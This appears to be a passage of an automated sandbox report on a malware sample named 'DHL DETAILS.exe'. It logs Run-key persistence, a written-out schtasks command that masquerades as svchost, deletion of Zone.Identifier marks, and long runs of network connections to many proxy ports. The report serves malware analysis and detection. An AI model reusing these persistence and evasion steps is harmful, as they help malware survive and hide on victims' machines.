                Source: C:\Users\user\Desktop\DHL DETAILS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                Source: C:\Users\user\Desktop\DHL DETAILS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                Source: C:\Users\user\Desktop\DHL DETAILS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VHFSQv

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe:Zone.Identifier read attributes | delete
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 58378
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 37592
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 57320
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 32896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 37592
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 6693
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 10005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 9480
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 32213
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50096
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 50293 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50336 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 52980
                Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 10005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50361 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50346 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 9480 -> 50082
                Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 32896
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50293
                Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 31280
                Source: unknownNetwork traffic detected: HTTP traffic on port 6693 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50495 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50637 -> 45108
                Source: unknownNetwork traffic detected: HTTP traffic on port 50519 -> 25825
                Source: unknownNetwork traffic detected: HTTP traffic on port 50437 -> 9150
                Source: unknownNetwork traffic detected: HTTP traffic on port 50555 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 50469 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50111
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 50411 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 8800 -> 50475
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 35774
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50428
                Source: unknownNetwork traffic detected: HTTP traffic on port 10005 -> 50428
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50521 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50377
                Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 53948
                Source: unknownNetwork traffic detected: HTTP traffic on port 50689 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50140
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 9045
                Source: unknownNetwork traffic detected: HTTP traffic on port 50643 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50520 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50538 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1981
                Source: unknownNetwork traffic detected: HTTP traffic on port 50535 -> 25843
                Source: unknownNetwork traffic detected: HTTP traffic on port 50561 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50109
                Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 58378
                Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50589 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50653 -> 20551
                Source: unknownNetwork traffic detected: HTTP traffic on port 50571 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50164
                Source: unknownNetwork traffic detected: HTTP traffic on port 50624 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 20000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 50679 -> 31243
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50363
                Source: unknownNetwork traffic detected: HTTP traffic on port 50807 -> 20816
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50672 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50681 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 5443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50727 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50751 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50713 -> 6446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 32213
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 9537
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 50909 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50790 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50771 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50942 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50748 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50469
                Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 30277
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50827 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 50384
                Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 5050
                Source: unknownNetwork traffic detected: HTTP traffic on port 58378 -> 50714
                Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 9050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50965 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 50882 -> 135
                Source: unknownNetwork traffic detected: HTTP traffic on port 50899 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 6821
                Source: unknownNetwork traffic detected: HTTP traffic on port 50927 -> 10006
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50386
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 35760
                Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50900 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50831 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 58839
                Source: unknownNetwork traffic detected: HTTP traffic on port 50859 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50946 -> 26591
                Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 5566
                Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 20614
                Source: unknownNetwork traffic detected: HTTP traffic on port 10010 -> 50612
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50712
                Source: unknownNetwork traffic detected: HTTP traffic on port 20551 -> 50653
                Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 51161 -> 54395
                Source: unknownNetwork traffic detected: HTTP traffic on port 50972 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 50989 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50938 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 51054 -> 5767
                Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 7895
                Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 55555
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51196 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50589
                Source: unknownNetwork traffic detected: HTTP traffic on port 31243 -> 50679
                Source: unknownNetwork traffic detected: HTTP traffic on port 51031 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51001 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 5630
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 48664
                Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 10007
                Source: unknownNetwork traffic detected: HTTP traffic on port 51229 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51007 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 228
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50728
                Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51183 -> 6969
                Source: unknownNetwork traffic detected: HTTP traffic on port 51166 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 10800
                Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 51280 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51191 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51079 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51245 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 51195 -> 25697
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 63997
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50727
                Source: unknownNetwork traffic detected: HTTP traffic on port 51247 -> 31280
                Source: unknownNetwork traffic detected: HTTP traffic on port 51215 -> 41890
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50738
                Source: unknownNetwork traffic detected: HTTP traffic on port 51251 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 6522
                Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50788
                Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 20000 -> 50588
                Source: unknownNetwork traffic detected: HTTP traffic on port 51281 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50868
                Source: unknownNetwork traffic detected: HTTP traffic on port 51242 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50927
                Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 42214
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50771
                Source: unknownNetwork traffic detected: HTTP traffic on port 51305 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50899
                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50953
                Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 64353
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50748
                Source: unknownNetwork traffic detected: HTTP traffic on port 51355 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50607
                Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50268 -> 9000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 1976
                Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51327 -> 28513
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51266
                Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 26589
                Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 16113
                Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 50979
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51309 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 51338 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 51369 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 50944 -> 43100
                Source: unknownNetwork traffic detected: HTTP traffic on port 50998 -> 58507
                Source: unknownNetwork traffic detected: HTTP traffic on port 50465 -> 12446
                Source: unknownNetwork traffic detected: HTTP traffic on port 50526 -> 53948
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51061
                Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 37339
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50831
                Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50938
                Source: unknownNetwork traffic detected: HTTP traffic on port 10007 -> 51140
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 51245
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51166
                Source: unknownNetwork traffic detected: HTTP traffic on port 51336 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51353 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51352 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 42380
                Source: unknownNetwork traffic detected: HTTP traffic on port 51368 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51403 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51412 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50329 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 50424 -> 62607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 48962
                Source: unknownNetwork traffic detected: HTTP traffic on port 6446 -> 50713
                Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51379 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51424 -> 31654
                Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51007
                Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 51073
                Source: unknownNetwork traffic detected: HTTP traffic on port 50706 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5767 -> 51054
                Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51281
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 51293
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51305
                Source: unknownNetwork traffic detected: HTTP traffic on port 51317 -> 2453
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51242
                Source: unknownNetwork traffic detected: HTTP traffic on port 50362 -> 5717
                Source: unknownNetwork traffic detected: HTTP traffic on port 50707 -> 9537
                Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 58630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 64767
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 35760
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51309
                Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 55555
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51248
                Source: unknownNetwork traffic detected: HTTP traffic on port 50619 -> 31794
                Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 5630
                Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 57745
                Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51107 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50910 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 31034
                Source: unknownNetwork traffic detected: HTTP traffic on port 50581 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 10010
                Source: unknownNetwork traffic detected: HTTP traffic on port 50663 -> 44499
                Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 16238
                Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 8520
                Source: unknownNetwork traffic detected: HTTP traffic on port 51473 -> 8123
                Source: unknownNetwork traffic detected: HTTP traffic on port 51528 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 51113
                Source: unknownNetwork traffic detected: HTTP traffic on port 51470 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50670 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50780 -> 37445
                Source: unknownNetwork traffic detected: HTTP traffic on port 50759 -> 59991
                Source: unknownNetwork traffic detected: HTTP traffic on port 51529 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51532 -> 49547
                Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 51527 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 51541 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51531 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51525 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 6087
                Source: unknownNetwork traffic detected: HTTP traffic on port 51526 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 51545 -> 1082
                Source: unknownNetwork traffic detected: HTTP traffic on port 51538 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 51616
                Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 16691
                Source: unknownNetwork traffic detected: HTTP traffic on port 51511 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51530 -> 3389
                Source: unknownNetwork traffic detected: HTTP traffic on port 51546 -> 9400
                Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 61464
                Source: unknownNetwork traffic detected: HTTP traffic on port 51567 -> 5811
                Source: unknownNetwork traffic detected: HTTP traffic on port 5443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 51535 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50950 -> 47585
                Source: unknownNetwork traffic detected: HTTP traffic on port 51569 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51226 -> 3128
